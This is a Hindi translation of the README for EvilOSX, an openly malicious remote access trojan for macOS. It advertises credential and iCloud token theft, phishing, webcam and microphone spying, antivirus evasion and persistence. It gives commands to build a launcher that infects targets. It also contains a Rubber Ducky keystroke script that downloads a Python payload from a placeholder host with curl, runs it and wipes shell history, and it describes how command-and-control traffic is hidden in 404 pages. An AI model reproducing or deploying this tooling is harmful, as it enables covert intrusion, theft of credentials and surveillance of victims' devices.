EvilOSX
macOS / OS X के लिए एक दुष्ट RAT (रिमोट प्रशासन उपकरण)।
Marco Generator Cedric Owens द्वारा
यह परियोजना अब सक्रिय नहीं है
विशेषताएँ
- एक टर्मिनल इंस्टेंस का अनुकरण करें
- सरल विस्तार योग्य मॉड्यूल प्रणाली
- कोई बॉट निर्भरता नहीं (शुद्ध पायथन)
- एंटी-वायरस द्वारा अज्ञात (OpenSSL AES-256 एन्क्रिप्टेड पेलोड)
- स्थायी
- GUI और CLI समर्थन
- Chrome पासवर्ड प्राप्त करें
- iCloud टोकन और संपर्क प्राप्त करें
- क्लिपबोर्ड प्राप्त करें/निगरानी करें
- ब्राउज़र इतिहास प्राप्त करें (Chrome और Safari)
- iTunes के माध्यम से iCloud पासवर्ड के लिए फिश करें
- iTunes (iOS) बैकअप गणना
- माइक्रोफ़ोन रिकॉर्ड करें
- वेबकैम का उपयोग करके डेस्कटॉप स्क्रीनशॉट या चित्र लें
- स्थानीय विशेषाधिकार वृद्धि के माध्यम से रूट प्राप्त करने का प्रयास करें
उपयोग कैसे करें
# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX
# Go into the repository
$ cd EvilOSX
# Install dependencies required by the server
$ sudo pip install -r requirements.txt
# Start the GUI
$ python start.py
# Lastly, run a built launcher on your target(s)
चेतावनी: चूंकि पेलोड लक्ष्य प्रणाली के अनुसार अद्वितीय बनाए जाते हैं (सर्वर द्वारा स्वचालित रूप से), जब कोई बॉट पहली बार कनेक्ट होता है तो सर्वर को चल रहा होना चाहिए।
उन्नत उपयोगकर्ता
यदि आप SSH पर इसका उपयोग करना चाहते हैं तो एक CLI भी है:
# Create a launcher to infect your target(s)
$ python start.py --builder
# Start the CLI
$ python start.py --cli --port 1337
# Lastly, run a built launcher on your target(s)
स्क्रीनशॉट

प्रेरणा
यह परियोजना मेरे Rubber Ducky के साथ उपयोग के लिए बनाई गई थी, यहाँ सरल स्क्रिप्ट है:
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/
DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500
REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER
STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
- किसी भी अनलॉक Mac को बैकडोर करने में लगभग 10 सेकंड लगते हैं, जो कि...... अच्छा है
- Terminal जानबूझकर ऐसे लिखा गया है, कुछ सिस्टम पर स्पॉटलाइट अन्यथा टर्मिनल नहीं ढूंढ पाएगा।
- कीबोर्ड सेटअप असिस्टेंट को बायपास करने के लिए सुनिश्चित करें कि आप VID&PID बदलते हैं जो यहाँ पाया जा सकता है।
Aluminum Keyboard (ISO) शायद वही है जिसकी आप तलाश कर रहे हैं।
संस्करण
EvilOSX का रखरखाव जितना संभव हो सेमैंटिक वर्जनिंग दिशानिर्देशों के तहत किया जाएगा।
सर्वर और बॉट रिलीज़ को निम्नलिखित प्रारूप के साथ क्रमांकित किया जाएगा:
और निम्नलिखित दिशानिर्देशों के साथ निर्मित:
- पिछड़ी संगतता को तोड़ने (पुराने बॉट के साथ) से मेजर बढ़ता है
- पिछड़ी संगतता को तोड़े बिना नए जोड़ से माइनर बढ़ता है
- बग फिक्स और विविध परिवर्तन से पैच बढ़ता है
SemVer पर अधिक जानकारी के लिए, कृपया https://semver.org/ पर जाएं।
डिज़ाइन नोट्स
- एक मशीन को संक्रमित करना तीन भागों में बांटा गया है:
- लक्ष्य मशीन पर एक लॉन्चर चलाया जाता है जिसका एकमात्र लक्ष्य स्टेजर को चलाना है
- स्टेजर सर्वर से एक लोडर का अनुरोध करता है जो यह संभालता है कि पेलोड कैसे लोड किया जाएगा
- लोडर को विशिष्ट रूप से एन्क्रिप्टेड पेलोड दिया जाता है और फिर स्टेजर को वापस भेज दिया जाता है
- सर्वर HTTP 404 त्रुटि पृष्ठों में छिपे संदेश भेजकर अपने संचार को छिपाता है (ब्लैकहैट के "Hiding In Plain Sight" से)
- कमांड अनुरोध GET अनुरोध के माध्यम से सर्वर से प्राप्त किए जाते हैं
- कमांड प्रतिक्रियाएँ POST अनुरोध के माध्यम से सर्वर को भेजी जाती हैं
- मॉड्यूल पायथन की गतिशील प्रकृति का लाभ उठाते हैं, उन्हें किसी भी कॉन्फ़िगरेशन विकल्पों के साथ zlib के साथ संपीड़ित करके नेटवर्क पर भेजा जाता है
- चूंकि बॉट केवल सर्वर से संचार करता है और कभी विपरीत नहीं, सर्वर के पास यह जानने का कोई तरीका नहीं है कि बॉट कब ऑफलाइन हो जाता है
मुद्दे
कृपया बेझिझक कोई भी मुद्दा या सुविधा अनुरोध यहाँ सबमिट करें।
योगदान
मॉड्यूल बनाने के तरीके के लिए एक सरल गाइड के लिए यहाँ क्लिक करें।
श्रेय
- अद्भुत Empire परियोजना
- Patrick Wardle को उनकी शानदार बातों के लिए धन्यवाद, Objective-See देखें
- manwhoami को उनकी परियोजनाओं के लिए: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts
(अब हटा दिया गया है... यदि आप फिर से प्रकट होते हैं तो मुझे बताएं)
- slowloris मॉड्यूल लगभग PySlowLoris से कॉपी किया गया है
- urwid और यह कोड जिसने CLI के साथ मेरा बहुत समय बचाया
- motusora द्वारा बनाया गया लोगो
लाइसेंस
GPLv3